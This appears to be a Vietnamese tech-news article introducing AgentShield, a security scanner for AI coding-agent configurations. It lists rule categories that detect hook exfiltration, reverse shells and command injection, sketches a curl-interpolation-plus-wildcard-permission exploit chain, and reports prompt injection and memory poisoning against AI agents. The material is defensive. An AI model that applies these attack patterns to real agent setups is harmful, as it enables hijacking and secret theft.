AgentShield: Scanner bảo mật đầu tiên chuyên cho AI coding agent — 102 rules, grade A–F, tích hợp Opus 4.6 red-team

TL;DR

AgentShield là scanner bảo mật open-source đầu tiên chuyên quét cấu hình AI coding agent — không phải source code, không phải container. Nó đọc hiểu CLAUDE.md, settings.json, MCP configs, hook definitions và agent skills, rồi chấm điểm từ A đến F trên thang 0–100 theo 102 rules chia 5 nhóm. Bản CLI và GitHub Action miễn phí (MIT license); tier Pro $19/seat/month đi kèm GitHub App auto-scan toàn org. Điểm khác biệt lớn nhất: flag --opus chạy 3 Claude Opus 4.6 agents theo pipeline red-team / blue-team / auditor để tìm multi-step exploit chain mà regex scanner không thấy.

Có gì mới

Affaan Mustafa (@affaanmustafa) xây AgentShield tại Claude Code Hackathon (Cerebral Valley × Anthropic, tháng 2/2026) và release v1.4.0 ngày 22/03/2026 sau 126 commits. Cài qua một lệnh:

npx ecc-agentshield scan

Tool auto-discover thư mục ~/.claude/, quét toàn bộ config files, và in ra report dạng terminal có thanh progress bar cho từng category. Ngoài CLI còn có GitHub Action (affaan-m/agentshield@v1), ECC plugin, và ECC Tools GitHub App với Stripe billing.

Tại sao đáng chú ý

Bối cảnh bảo mật AI agent trong Q1/2026 khá căng thẳng:

Snyk ToxicSkills (01/2026): scan 3.984 community skills, phát hiện 36% chứa prompt injection và 1.467 malicious payloads — tức ~12% một marketplace lớn bị lây nhiễm.
Hunt.io (02/2026): liệt kê khoảng 17.470 instance OpenClaw exposed internet, trong đó CVE CVSS 8.8 cho phép 1-click RCE trên 17.500+ instance.
Microsoft research (02/2026): memory-poisoning attack lan qua 31 công ty thuộc 14 ngành.
CVE-2026-21852: API key leak khi override ANTHROPIC_BASE_URL.

AI agent không bảo mật by-default — chúng nhận untrusted input (PR comments, email, screenshot OCR, MCP tool output) rồi chạy shell, truy cập secrets, ghi file. AgentShield là nỗ lực đầu tiên gộp detection + auto-fix + adversarial LLM analysis thành một pipeline cho layer config, chứ không phải code hay runtime.

Chi tiết kỹ thuật: 102 rules / 5 categories

Category	Số rule	Điển hình phát hiện
Secrets Detection	10 rules / 14 patterns	API keys (`sk-ant-...`), tokens, env leak
Permission Audit	10 rules	Wildcard `Bash(*)`, missing deny, destructive git flags
Hook Analysis	34 rules	Command injection, exfiltration, reverse shell, silent error
MCP Server Security	23 rules	Supply-chain risk, hardcoded secret, high-risk server
Agent Config Review	25 rules	Unrestricted tools, prompt injection, hidden instructions

Tính năng giảm noise quan trọng là runtime confidence scoring: finding trong active config tính hệ số 1.0×, project-local 0.75×, plugin manifest 0.5×, và template/docs example chỉ 0.25×. Các secret-scanner truyền thống không phân biệt được nên report đầy false positive từ ví dụ trong README.

Auto-fix engine có thể tự động thay hardcoded secret bằng reference env variable; lệnh agentshield init generate hardened baseline config cho dự án mới.

Pipeline Opus 4.6: red-team / blue-team / auditor

Chạy agentshield scan --opus --stream sẽ trigger ba Claude Opus 4.6 agents làm việc adversarial:

Red Team (attacker) — tìm exploitable attack vector và multi-step exploit chain. Ví dụ: hook curl có interpolation ${file} kết hợp với permission Bash(*) = command injection chain.
Blue Team (defender) — đánh giá protection hiện có, gợi ý hardening (thêm PreToolUse hook, restrict wildcard).
Auditor — tổng hợp findings hai bên thành prioritized risk assessment với action items.

Cần ANTHROPIC_API_KEY để chạy; chi phí API do user tự chịu. Flag bổ sung: --injection (prompt injection taint analysis), --sandbox, --taint, --deep.

So với các scanner hiện có

Tool	Focus	Hiểu config AI agent?	Adversarial LLM analysis?
Gitleaks / TruffleHog	Secret trong source code	Không (regex thuần)	Không
Snyk / Semgrep	Vulnerability trong app code	Không	Không
Snyk ToxicSkills	Skill trên marketplace	Một phần	Không
AgentShield	.claude/, MCP, hook, permission	Có (semantic-aware)	Có (`--opus`)

Use cases thực tế

Solo dev / indie hacker: chạy npx ecc-agentshield scan trước khi push .claude/, bắt ngay sk-ant-a...cdef hardcoded trong CLAUDE.md.
Team CI/CD: thêm GitHub Action, set min-severity: medium và fail-on-findings: true — PR chứa wildcard permission hay malicious hook sẽ bị block (exit code 2).
Security team enterprise: cài ECC Tools GitHub App, auto-scan toàn org repos với billing tập trung qua Stripe.
Researcher / red teamer: chạy --opus --injection --taint --deep để simulate chain attack trên cấu hình client thật.
Marketplace moderator: scan skill batch trước khi cho publish — tránh lặp lại vụ 1.467 malicious payloads Snyk phát hiện.

Giới hạn & pricing

Platform: hiện chỉ focus Claude Code (CLAUDE.md, .claude/, MCP config). Cursor, Windsurf, Continue, OpenCode chưa được support rõ.
False positive: dù có runtime confidence scoring, repo lớn với nhiều skill example vẫn có thể noise — cần tune --min-severity.
Opus cost: --opus cần API key của user; chi phí Anthropic API không nhỏ nếu chạy thường xuyên.
Pricing: CLI + GitHub Action + npm package MIỄN PHÍ (MIT). ECC Tools Pro $19/seat/month.

Điều tiếp theo

Repo đã merge PR #17 và #40 về organization-wide security policy enforcement, gợi ý hướng phát triển sang compliance dashboard cho enterprise. MiniClaw runtime (sandbox kèm theo, listen localhost:3847, rate limit 10 req/min/IP, strip 12+ injection patterns, zero external runtime deps) có dấu hiệu được tách thành product riêng cho isolated agent execution.

Với tốc độ CVE và incident liên quan AI agent đang tăng mỗi tuần, scanner dạng AgentShield — nhất là khi kết hợp adversarial LLM analysis — nhiều khả năng trở thành checklist bắt buộc trong pipeline CI/CD của team dùng Claude Code nghiêm túc.

Nguồn: github.com/affaan-m/agentshield, everything-claude-code security guide, @VivekIntel announcement.